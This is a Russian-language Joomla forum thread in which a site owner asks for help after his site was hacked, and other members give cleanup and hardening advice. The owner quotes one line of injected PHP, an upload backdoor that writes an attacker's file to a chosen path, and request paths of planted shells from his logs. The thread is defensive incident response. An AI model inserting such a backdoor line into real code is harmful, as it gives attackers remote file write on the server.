Форум русской поддержки Joomla!® CMS
05.12.2016, 20:42:10 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Уязвимость Joomla

 (Прочитано 3020 раз)
0 Пользователей и 1 Гость смотрят эту тему.
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« : 07.06.2015, 17:56:48 »

Добрый день, проблема такая, в 5х php файлах (loader.php , import.legacy.php, cms.php...) были обнаружены такие строчки:
"if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}"
после чего сайт перестал работать до их удаления, 3 недели до этого, был похожий случай, так же пофикшен их удалением, в чем проблема, где может быть дыра?
Так же в файле config.php содержится такой код, это нормально?
Показать текстовый блок
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #1 : 07.06.2015, 18:12:21 »

версия Joomla ? сканером еще поищи вирус/шелл
config.php удали
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #2 : 07.06.2015, 18:29:08 »

версия Joomla ? сканером еще поищи вирус/шелл
config.php удали
Версия 3.1, какой сканер посоветуете? config.php удалил
Записан
wishlight
Профи
********

Репутация: +200/-1
Online Online

Пол: Мужской
Сообщений: 3486


skype aqaus.com


« Ответ #3 : 07.06.2015, 20:30:07 »

ai-bolit. ПС.. Не люблю доктора Azn
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #4 : 11.06.2015, 22:01:16 »

Почистил сайт, но начали появлятся файлы под названиями "config.php" "libraries/joomla/crypt/error.php" "public_html/includes/system.php" "./public_html/images/sampledata/xml.php
.//public_html/images/color/session.php
./public_html/sxd/lang/view.php"
С содержимым по типу config.php в шапке топика, в чем может быть проблема, неужто из за версии движка 3.3.1? Есть ли способы найти проблему и что делать? В логах ничего интересного.
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #5 : 11.06.2015, 22:05:24 »

значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #6 : 11.06.2015, 22:19:17 »

значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?
Все легально, все пароли сменили, на eval искал по ftp, много нашёл и удалил, проверил антивирусниками и в ручную, но вчера опять появился новый файл ("libraries/joomla/crypt/error.php"), в котором был вредоносный код, в логах ничего интересного нет.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #7 : 11.06.2015, 22:24:46 »

Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #8 : 11.06.2015, 22:27:32 »

Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код
Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #9 : 11.06.2015, 22:30:49 »

слить все на локаль, еще раз проверить всеми антивирусами и руками на eval и подобное
сменить все логины\пароли, адреса, ipшники, страну проживания

Ну честно, не бывает чудес, либо вы ставили варезное расширение либо у вас в компе вирус, который есть младенцев берет пароли с ftp клиента и все
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #10 : 11.06.2015, 23:16:08 »

Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...
Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Можно применить сканер мониторинга файлов, типа Eyesite . Узнать откуда рассылка спама можно, если версия PHP не ниже 5.3, с помощью mail.add_x_header
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #11 : 11.06.2015, 23:17:55 »

Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Простите, что? если расширения содержат уязвимость - нет смысла их искать и чистить?
И что означает "твоей"?
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #12 : 12.06.2015, 02:31:20 »

Проверил файлы, нашёл в 30 файлах такой код:
Так же заметил, что все файлы были модифицырованы 08.06 в 1.27
Ацес логи за то время:
Показать текстовый блок
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #13 : 12.06.2015, 02:35:49 »

Насколько я понял, все началось после ""GET /cache/cwm.php " в самом файле, который я потер только что, лежал огромный eval код, так ли?
За 7 число нашёл логи с файлом cwp.php в котором похожий код:
Показать текстовый блок
Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?
« Последнее редактирование: 12.06.2015, 02:46:50 от 13th_doctor_who » Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #14 : 12.06.2015, 08:56:08 »

.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images
Записан
wishlight
Профи
********

Репутация: +200/-1
Online Online

Пол: Мужской
Сообщений: 3486


skype aqaus.com


« Ответ #15 : 12.06.2015, 09:39:11 »

неужто из за версии движка 3.3.1

Да
Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #16 : 12.06.2015, 15:10:34 »

.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images
Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #17 : 12.06.2015, 15:59:44 »

Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"
Другие папки тоже надо закрывать, а не только кеш и images

Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?
этих логов не достаточно, было бы не плохо посмотреть дату создания и модификации вредоносных файлов и по цепочки отслеживать. Проблемой может быть что угодно, как просто слитые пароли, так и уязвимсоти и не надежность хостера, тут нужно комплексно подходить к решению задачи, грамматно навести профилактические меры, чистку вредоносов, выставить политику логирования, также бы не помешала, какая нить система IDS но такие систему могут нагружать работу CMS.
« Последнее редактирование: 12.06.2015, 16:08:57 от winstrool » Записан
13th_doctor_who
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 12



« Ответ #18 : 12.06.2015, 16:11:49 »

Другие папки тоже надо закрывать, а не только кеш и images
Закрыл через .htaccess:
Показать текстовый блок
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #19 : 12.06.2015, 16:16:20 »

Закрыл через .htaccess:
Показать текстовый блок
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.
Недостаточно расширений, обходятся легко!, не поможет.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet